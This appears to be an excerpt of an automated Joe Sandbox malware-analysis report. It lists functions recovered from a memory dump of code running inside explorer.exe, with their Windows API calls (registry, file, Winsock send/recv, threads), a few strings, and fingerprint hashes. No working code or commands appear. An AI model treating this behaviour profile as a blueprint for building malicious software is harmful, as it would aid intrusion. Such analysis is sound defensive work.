                                                          Function 029C96B0 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 246registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocLocalValue$lstrcpy
                                                          • String ID: .DLL$SOFTWARE\%s${93E361CC-7FE2-49D2-8F5A-80A2844BEEC6}
                                                          • API String ID: 2708694652-342928603
                                                          • Opcode ID: d2f761359ecd2f75558a28f49f858458926a6d530cf0fc5858002e5beceb9b01
                                                          • Instruction ID: 01c10c041dd2c969867afa0e1d722c9f98b7db0b16f3b180f92be928c816553a
                                                          • Opcode Fuzzy Hash: d2f761359ecd2f75558a28f49f858458926a6d530cf0fc5858002e5beceb9b01
                                                          • Instruction Fuzzy Hash: 03D10936208BC483E765DB15F4983AAB3A5F7C9780F50452AEA8E87B68DF7CC545CB01
                                                          Function 029D5700 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 94memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029D2830: SHGetKnownFolderPath.SHELL32 ref: 029D28A7
                                                            • Part of subcall function 029D2830: LocalAlloc.KERNEL32 ref: 029D28FC
                                                            • Part of subcall function 029D2830: CoTaskMemFree.COMBASE ref: 029D2955
                                                          • CreateDirectoryW.KERNEL32 ref: 029D5738
                                                          • LocalAlloc.KERNEL32 ref: 029D575E
                                                          • CreateFileW.KERNEL32 ref: 029D57CE
                                                          • GetLastError.KERNEL32 ref: 029D57D9
                                                          • LocalFree.KERNEL32 ref: 029D5876
                                                          • LocalFree.KERNEL32 ref: 029D5881
                                                          • LocalFree.KERNEL32 ref: 029D58D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$Free$AllocCreate$DirectoryErrorFileFolderKnownLastPathTask
                                                          • String ID: %s%s$P
                                                          • API String ID: 1317037737-50959982
                                                          • Opcode ID: 232f62101a1501bd58ab4f6f3f41fdcff484da9f1ed25b9adb55ab6004dfe2fc
                                                          • Instruction ID: 332e389e9296c125885830efce3af14dad1fb11184db51a10eb3ad4f1d3095e1
                                                          • Opcode Fuzzy Hash: 232f62101a1501bd58ab4f6f3f41fdcff484da9f1ed25b9adb55ab6004dfe2fc
                                                          • Instruction Fuzzy Hash: 37511D32608B40C7E710DB15F85832AB7A5F7C67A5FA04225E6A942AF8DF7DC589CF01
                                                          Function 029F1CF4 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 482796045-0
                                                          • Opcode ID: 5d34ed3c74e4fc54becda7c4f507b6c8f71872e51e63e7dcdcd9020a15ad3c0f
                                                          • Instruction ID: 927db8030616ef8bcbdeb0afe7195df3c149848a8c544f6c5a3a823a2683ca3f
                                                          • Opcode Fuzzy Hash: 5d34ed3c74e4fc54becda7c4f507b6c8f71872e51e63e7dcdcd9020a15ad3c0f
                                                          • Instruction Fuzzy Hash: 3B512922314A81C5CBE49F3A959427D73A6FB81BE8B544B12DB7E4B7E0DF28C412C785
                                                          Function 029E6620 Relevance: 16.7, APIs: 11, Instructions: 228timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E665F
                                                            • Part of subcall function 029E4D40: send.WS2_32 ref: 029E4D6C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                                                          • String ID:
                                                          • API String ID: 1596855159-0
                                                          • Opcode ID: 2ecc7203e8acfedafd9593a6d32f009ae4103638e6d19cc8ece92d7067b5796f
                                                          • Instruction ID: 99c4c7ea4597ff3cbaab6d7ba4e4ae98a2086bcaa090d51d8eaccab4723d7e28
                                                          • Opcode Fuzzy Hash: 2ecc7203e8acfedafd9593a6d32f009ae4103638e6d19cc8ece92d7067b5796f
                                                          • Instruction Fuzzy Hash: F1C1D57660C7C0CADB72CF19E4857AAB7A9F7D8744F00851ADA8A87B58DB79C484CF01
                                                          Function 029E4AF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateEventObjectResumeSingleThreadWait
                                                          • String ID: d
                                                          • API String ID: 2620549756-2564639436
                                                          • Opcode ID: 592f94ce954db860c18b597f35d4464da5a2947c67479e3f62d6781917b22713
                                                          • Instruction ID: 84c0c8592d2731edf54cbe139427fee759913375764e39996a70462b0c99c3ac
                                                          • Opcode Fuzzy Hash: 592f94ce954db860c18b597f35d4464da5a2947c67479e3f62d6781917b22713
                                                          • Instruction Fuzzy Hash: B8419236218B8482DB14CB16F49831AB7B0F7CAB94F14551AEB8E47B68DF79C585CB40
                                                          Function 029F28BC Relevance: 12.1, APIs: 8, Instructions: 125COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2819658684-0
                                                          • Opcode ID: 893167d7847499874c4097aab42bfe1cf281a2da1c8fce2eb6c536bcf226c01c
                                                          • Instruction ID: 150870bbfd21d8c5f1d607b6dbf32fcd4614b1e57dcb67a1f4906f3bacab862c
                                                          • Opcode Fuzzy Hash: 893167d7847499874c4097aab42bfe1cf281a2da1c8fce2eb6c536bcf226c01c
                                                          • Instruction Fuzzy Hash: FB41C672E017518AEFE69B65C5403BC3B65EB44BA8F144621DF990BB98DB38C482CB11
                                                          Function 029E5CD0 Relevance: 10.6, APIs: 7, Instructions: 100timememorynetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalAlloc.KERNEL32 ref: 029E5D32
                                                          • htons.WS2_32 ref: 029E5D5F
                                                            • Part of subcall function 029E5FB0: WSACreateEvent.WS2_32 ref: 029E5FC8
                                                            • Part of subcall function 029E5FB0: WSAEventSelect.WS2_32 ref: 029E5FEF
                                                            • Part of subcall function 029E5FB0: WSAWaitForMultipleEvents.WS2_32 ref: 029E6044
                                                            • Part of subcall function 029E5FB0: WSACloseEvent.WS2_32 ref: 029E6053
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E5DD8
                                                            • Part of subcall function 029E4D40: send.WS2_32 ref: 029E4D6C
                                                            • Part of subcall function 029E5E90: WSACreateEvent.WS2_32 ref: 029E5EA8
                                                            • Part of subcall function 029E5E90: WSAEventSelect.WS2_32 ref: 029E5ECF
                                                            • Part of subcall function 029E5E90: WSAWaitForMultipleEvents.WS2_32 ref: 029E5F24
                                                            • Part of subcall function 029E5E90: WSACloseEvent.WS2_32 ref: 029E5F33
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E5E1B
                                                            • Part of subcall function 029E4D00: recv.WS2_32 ref: 029E4D2C
                                                          • und_memcpy.LIBCMTD ref: 029E5E59
                                                          • LocalFree.KERNEL32 ref: 029E5E63
                                                          • LocalFree.KERNEL32 ref: 029E5E72
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                          • String ID:
                                                          • API String ID: 2815282806-0
                                                          • Opcode ID: 2105b74b953cb8fade7e457716c72ae21034c97a58388d9c301a09ad8ad33af6
                                                          • Instruction ID: de5a2fc83bfb9b3b77d4e52ec12ae53ce982ad52be656f70dc1dcb40557df886
                                                          • Opcode Fuzzy Hash: 2105b74b953cb8fade7e457716c72ae21034c97a58388d9c301a09ad8ad33af6
                                                          • Instruction Fuzzy Hash: 7C41C376618B8486CB519B1AE48431EBBB0F7CABD4F519416EF8E43B28CB79C4858B00
                                                          Function 029E5B40 Relevance: 10.6, APIs: 7, Instructions: 92timememorynetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalAlloc.KERNEL32 ref: 029E5BA0
                                                          • htons.WS2_32 ref: 029E5BCD
                                                            • Part of subcall function 029E5FB0: WSACreateEvent.WS2_32 ref: 029E5FC8
                                                            • Part of subcall function 029E5FB0: WSAEventSelect.WS2_32 ref: 029E5FEF
                                                            • Part of subcall function 029E5FB0: WSAWaitForMultipleEvents.WS2_32 ref: 029E6044
                                                            • Part of subcall function 029E5FB0: WSACloseEvent.WS2_32 ref: 029E6053
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E5C20
                                                            • Part of subcall function 029E4D40: send.WS2_32 ref: 029E4D6C
                                                            • Part of subcall function 029E5E90: WSACreateEvent.WS2_32 ref: 029E5EA8
                                                            • Part of subcall function 029E5E90: WSAEventSelect.WS2_32 ref: 029E5ECF
                                                            • Part of subcall function 029E5E90: WSAWaitForMultipleEvents.WS2_32 ref: 029E5F24
                                                            • Part of subcall function 029E5E90: WSACloseEvent.WS2_32 ref: 029E5F33
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 029E5C65
                                                            • Part of subcall function 029E4D00: recv.WS2_32 ref: 029E4D2C
                                                          • und_memcpy.LIBCMTD ref: 029E5CA3
                                                          • LocalFree.KERNEL32 ref: 029E5CAD
                                                          • LocalFree.KERNEL32 ref: 029E5CBC
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                          • String ID:
                                                          • API String ID: 2815282806-0
                                                          • Opcode ID: c99f03fbf2cb1e4577019d7c467d779939ed6b82843f5f7e794688728a0eefbc
                                                          • Instruction ID: 4daa85c478ac0eb3475b7bdc4c5345106f7405489fc6491312b489e344b5a5d5
                                                          • Opcode Fuzzy Hash: c99f03fbf2cb1e4577019d7c467d779939ed6b82843f5f7e794688728a0eefbc
                                                          • Instruction Fuzzy Hash: FB41B776618B8486CB51DB1AE49071ABBB4F7CAB84F519416EF8E43B68CB3EC445CF00
                                                          Function 029F10E0 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: 5c6edd9b13529751f3dea23086ed4ae990fb3353bd24ccbaee78c292adf0ad87
                                                          • Instruction ID: 606b1dbac29d60847a761379c2e7c7373037447ec86ade17a87339f7ff4872dd
                                                          • Opcode Fuzzy Hash: 5c6edd9b13529751f3dea23086ed4ae990fb3353bd24ccbaee78c292adf0ad87
                                                          • Instruction Fuzzy Hash: C811E43231064885DA866FA5EC4077E6A16A7D0FB5F494B06DF7A1B3D0CB78C441CBA1
                                                          Function 029F1924 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: d574cd3934c07f8b2f60bd93a24ec8070369997878e34e866a9726b187f580fb
                                                          • Instruction ID: 53f410b45563c5829e264a2aacd1d0edb46d7c3cc59feac728286af115bf8110
                                                          • Opcode Fuzzy Hash: d574cd3934c07f8b2f60bd93a24ec8070369997878e34e866a9726b187f580fb
                                                          • Instruction Fuzzy Hash: 1F11293231064486DB86AFA5ED4036E7A52A7D0FB1F494606DF6A0B3D1CBB8C480CBE1
                                                          Function 029D2AB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeTask$AllocFolderKnownLocalPathwnsprintf
                                                          • String ID: %s\%s
                                                          • API String ID: 294551330-4073750446
                                                          • Opcode ID: e034455d5965af291a0f68fa82299280106341982249379c91bb47f711653bab
                                                          • Instruction ID: 44260459f6d8700e91c24917b1df855706418a16f86e08d33c2b32d48aaa13ea
                                                          • Opcode Fuzzy Hash: e034455d5965af291a0f68fa82299280106341982249379c91bb47f711653bab
                                                          • Instruction Fuzzy Hash: 36110032624A8482D790DF65E86875AB364FBC5784F405025FA8F87B78DF7CC546CB00
                                                          Function 029CBFB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029E9E0C: _errno.LIBCMT ref: 029E9E43
                                                            • Part of subcall function 029E9E0C: _invalid_parameter_noinfo.LIBCMT ref: 029E9E4E
                                                          • RegGetValueW.ADVAPI32 ref: 029CC038
                                                          • LocalAlloc.KERNEL32 ref: 029CC051
